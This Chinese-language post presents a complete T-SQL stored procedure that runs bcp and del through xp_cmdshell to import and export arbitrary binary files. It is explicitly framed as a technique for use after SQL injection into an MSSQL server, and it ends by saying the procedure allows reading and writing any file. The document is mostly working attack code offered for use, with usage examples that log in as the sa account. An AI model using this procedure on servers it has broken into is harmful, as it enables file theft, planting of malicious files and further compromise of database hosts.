注入mssql后使用存储过程读写任意文件

创建读写二进制文件的存储过程，内容如下：

 

 

 

 

/*--bcp-二进制文件的导入导出，调用示例 ：

 

create table tb (img image);

 

--数据导入

 exec sp_binaryIO '.', 'sa', '', 'test..tb', 'img', 'c:/abc.jpg', 0 

 

--数据导出 

 exec sp_binaryIO '.', 'sa', '', 'test..tb', 'img', 'c:/a.jpg', 1

 

drop table tb;

 

--*/ 

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_binaryIO]') and OBJECTPROPERTY(id, N'IsProcedure') = 1) 

drop procedure [dbo].[sp_binaryIO] 

GO

 

Create proc sp_binaryIO 

@servename varchar (30), --服务器名称 

@username varchar (30), --用户名 

@password varchar (30), --密码 

@tbname varchar (500),   --数据库..表名 

@fdname varchar (30),   --字段名 

@fname varchar (1000), --目录+文件名

@isout bit=1   --1导出((默认), 0导入 

AS 

declare @fname_in varchar(1000), --bcp处理应答文件名 

@fsize varchar(20),   --要处理的文件的大小 

@m_tbname varchar(50),   --临时表名 

@sql varchar(8000)

 

--取得导入文件的大小 

if @isout=1 

set @fsize = '0'

else 

begin 

  create table #tb(可选名 varchar(20), 大小 int, 创建日期 varchar(10), 创建时间 varchar(20),

上次写操作日期 varchar(10), 上次写操作时间 varchar(20), 上次访问日期 varchar(10),

上次访问时间 varchar(20), 特性 int) 

insert into #tb exec master..xp_getfiledetails @fname 

  select @fsize = 大小 from #tb

  drop table #tb 

  if @fsize is null 

begin 

   print '文件未找到'

   return 

end

end

 

--生成数据处理应答文件 

set @m_tbname = '[##temp' + cast(newid() as varchar(40)) + ']'

set @sql = 'select * into ' + @m_tbname + ' from ( 

 select null as 类型 

 union all select 0 as 前缀 

 union all select ' + @fsize + ' as 长度 

 union all select null as 结束 

 union all select null as 格式 

 ) a'

exec(@sql) 

select @fname_in = @fname + '_temp', 

@sql = 'bcp "' + @m_tbname + '" out "' + @fname_in + '" /S"' + @servename 

+ case when isnull(@username,'') = '' then '' else '" /U"' + @username end 

+ '" /P"' + isnull(@password, '') + '" /c' 

exec master..xp_cmdshell @sql

 

--删除临时表 

set @sql = 'drop table ' + @m_tbname 

exec(@sql)

 

if @isout=1 

begin 

-- 导出

  set @sql = 'bcp "select top 1 ' + @fdname + ' from ' + @tbname

+ '" queryout "' + @fname + '" /S"' + @servename 

+ case when isnull(@username,'') = '' then '' else '" /U"' + @username end 

+ '" /P"' + isnull(@password,'')

+ '" /i"' + @fname_in + '"' 

exec master..xp_cmdshell @sql 

end 

else 

begin 

-- 导入

set @sql = 'bcp "'+ @tbname + '" in "' + @fname 

+ '" /S"' + @servename 

+ case when isnull(@username,'')='' then '' else '" /U"' + @username end 

+ '" /P"' + isnull(@password, '') + '" /i"' + @fname_in + '"' 

exec master..xp_cmdshell @sql

end

 

--删除数据处理应答文件 

set @sql = 'del ' + @fname_in 

exec master..xp_cmdshell @sql

 

go

 

 

 

 

 

 

有了这个存储过程就可以读写任意的文件了。